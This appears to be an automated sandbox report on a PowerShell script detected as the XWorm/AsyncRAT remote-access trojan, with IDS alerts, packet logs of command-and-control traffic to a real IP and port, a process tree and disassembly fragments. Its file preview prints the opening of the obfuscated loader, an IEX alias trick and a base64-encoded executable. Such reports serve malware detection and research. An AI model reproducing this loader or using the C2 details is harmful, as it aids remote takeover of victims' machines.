                                          SHA512:65a399b7cee81d43cc5f55667f6ed3a19a90a92647b52e18606cfd6599d00b59038a6c126543506e121cca939efca40703ba9deb11eb18bd1f02031fc3b89d32
                                          SSDEEP:3072:tDY+KK5sCTIO5MTe4ydXHLM8DIVI96igQycLQxvBzAqx9aKVo6sQ4aR6s:tDY+xiYIO5MTe4ydXHLM8DIVI96igQr4
                                          TLSH:95E36C330202FD8F6B7F2F84F5043E951C68247B8B599558FACA0AA925B6520DF39DF4
                                          File Content Preview:ipconfig /flushdns...... $t0='BBBaIEX'.replace('BBBa','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAE
                                          Icon Hash:3270d6baae77db44
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-18T08:15:42.199229+0100 | 2858800 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:15:42.687040+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:15:42.745508+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:15:55.132992+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:15:55.134693+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:15:58.442712+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:15:58.442712+0100 | 2858801 | ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:16:07.680452+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:16:07.682242+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:20.460191+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:16:20.463819+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:28.596991+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:16:32.774138+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:16:32.775981+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:36.366021+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:16:36.368542+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:43.293961+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:16:43.296108+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:51.430755+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:16:51.433298+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:16:58.869971+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:16:59.242947+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:16:59.247247+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:04.430160+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:04.432459+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:04.621094+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:04.622708+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:04.743277+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:04.745103+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:04.934293+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:04.943036+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:15.291141+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:15.295456+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:15.482157+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:15.486296+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:20.387690+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:20.415519+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:20.728031+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:21.133907+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:21.143105+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:21.324994+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:21.327680+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.7 | 49723 | 92.255.57.155 | 4411 | TCP
2024-12-18T08:17:28.636059+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:54.256561+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
2024-12-18T08:17:58.429921+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.7 | 49723 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 08:15:29.355488062 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:15:29.475188971 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:15:29.477747917 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:15:29.609026909 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:15:29.728620052 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:15:42.199229002 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:15:42.318876028 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:15:42.687040091 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:15:42.731874943 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:15:42.745507956 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:15:42.865202904 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:15:54.701044083 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:15:54.820631027 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:15:55.132992029 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:15:55.134692907 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:15:55.254213095 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:15:58.442712069 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:15:58.497575045 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:16:07.248007059 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:16:07.367458105 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:16:07.680452108 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:16:07.682241917 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:16:07.801673889 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:16:19.794914961 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:16:19.914587975 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:16:20.460191011 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:16:20.463819027 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:16:20.583278894 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:16:28.596991062 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:16:28.638439894 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:16:32.341955900 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:16:32.461714029 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:16:32.774137974 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:16:32.775980949 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:16:32.895955086 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:16:35.934010983 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:16:36.053518057 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:16:36.366020918 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:16:36.368541956 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:16:36.488812923 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:16:42.861490965 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:16:42.980979919 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:16:43.293961048 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:16:43.296108007 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:16:43.415616989 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:16:50.998294115 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:16:51.117978096 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:16:51.430754900 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
Dec 18, 2024 08:16:51.433298111 CET | 49723 | 4411 | 192.168.2.7 | 92.255.57.155
Dec 18, 2024 08:16:51.552818060 CET | 4411 | 49723 | 92.255.57.155 | 192.168.2.7
                                          Dec 18, 2024 08:16:58.810969114 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:16:58.869971037 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:58.930501938 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:58.937915087 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:16:59.242947102 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:16:59.247246981 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:16:59.366729975 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:03.998126030 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:04.117598057 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:04.117650032 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:04.237165928 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:04.237276077 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:04.357243061 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:04.430160046 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:04.432459116 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:04.553040981 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:04.621093988 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:04.622708082 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:04.742254019 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:04.743277073 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:04.745102882 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:04.905095100 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:04.934293032 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:04.943036079 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:05.065685987 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:14.857822895 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:14.978384972 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:14.978630066 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:15.098208904 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:15.291141033 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:15.295455933 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:15.414988041 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:15.482156992 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:15.486295938 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:15.605820894 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:19.951476097 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:20.071089983 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:20.295284986 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:20.387690067 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:20.415457010 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:20.415518999 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:20.535651922 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:20.701592922 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:20.728030920 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:20.779344082 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:20.821170092 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:20.821305037 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:20.940855980 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:21.133907080 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:21.143105030 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:21.262614965 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:21.324994087 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:21.327680111 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:21.447242975 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:28.636059046 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:28.695657015 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:53.779639959 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:53.899832964 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:54.256561041 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:54.310758114 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:58.429920912 CET44114972392.255.57.155192.168.2.7
                                          Dec 18, 2024 08:17:58.482562065 CET497234411192.168.2.792.255.57.155
                                          Dec 18, 2024 08:17:59.938184023 CET497234411192.168.2.792.255.57.155
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 08:15:18.578784943 CET | 1.1.1.1 | 192.168.2.7 | 0x84e1 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 08:15:18.578784943 CET | 1.1.1.1 | 192.168.2.7 | 0x84e1 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false


                                          Target ID:0
                                          Start time:02:15:22
                                          Start date:18/12/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WErY5oc4hl.ps1"
                                          Imagebase:0x7ff741d30000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1427937980.0000021380456000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1427937980.0000021380456000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1427937980.0000021380CF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1427937980.0000021380CF7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          Reputation:high
                                          Has exited:true

                                          Target ID:1
                                          Start time:02:15:22
                                          Start date:18/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff75da10000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:3
                                          Start time:02:15:24
                                          Start date:18/12/2024
                                          Path:C:\Windows\System32\ipconfig.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\system32\ipconfig.exe" /flushdns
                                          Imagebase:0x7ff613fd0000
                                          File size:35'840 bytes
                                          MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:4
                                          Start time:02:15:25
                                          Start date:18/12/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0x390000
                                          File size:45'984 bytes
                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:02:15:25
                                          Start date:18/12/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0x4f0000
                                          File size:45'984 bytes
                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.2951130842.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000002.2951130842.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.2953943377.0000000002861000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:true

                                          Target ID:12
                                          Start time:02:17:29
                                          Start date:18/12/2024
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7560 -s 1704
                                          Imagebase:0xd10000
                                          File size:483'680 bytes
                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true


                                            Execution Graph

                                            Execution Coverage:15.4%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:53
                                            Total number of Limit Nodes:5

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1490 d57a81-d57a90 1491 d57a92-d57a93 1490->1491 1492 d57a1b 1490->1492 1493 d581a0-d581de 1491->1493 1492->1493 1494 d581e6-d58214 GlobalMemoryStatusEx 1493->1494 1495 d58216-d5821c 1494->1495 1496 d5821d-d58245 1494->1496 1495->1496
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,00D5811A), ref: 00D58207
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2953365016.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_d50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: c8007a63d656ba712b9443334354cc389ddcea2a690725bfdf118f2fd0993dea
                                            • Instruction ID: 646b48e7ff5ef22980c57ba27a4ccceb3b4828913798274170b869354f317b32
                                            • Opcode Fuzzy Hash: c8007a63d656ba712b9443334354cc389ddcea2a690725bfdf118f2fd0993dea
                                            • Instruction Fuzzy Hash: B92179B1C0065ADFDB10DF9AD444B9EFBF4AF48311F24822AD814B7240D778A905CFA5

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1499 d57a14-d58214 GlobalMemoryStatusEx 1503 d58216-d5821c 1499->1503 1504 d5821d-d58245 1499->1504 1503->1504
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,00D5811A), ref: 00D58207
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2953365016.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_d50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: 4fb1d8b2e7b12c308063fd4be972ffa894278bd5ad0a587617ee5d26e6ea3ace
                                            • Instruction ID: 79041ad8b62c0059214002bf49d5c7cb6e3b5530266c82db41bb268444b6dfe4
                                            • Opcode Fuzzy Hash: 4fb1d8b2e7b12c308063fd4be972ffa894278bd5ad0a587617ee5d26e6ea3ace
                                            • Instruction Fuzzy Hash: E91114B1C00659DBDB10DF9AC445B9EFBF4EF48321F24812AE818B7240D778A945CFA5

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1507 d5819c-d581de 1509 d581e6-d58214 GlobalMemoryStatusEx 1507->1509 1510 d58216-d5821c 1509->1510 1511 d5821d-d58245 1509->1511 1510->1511
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,00D5811A), ref: 00D58207
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.2953365016.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_d50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
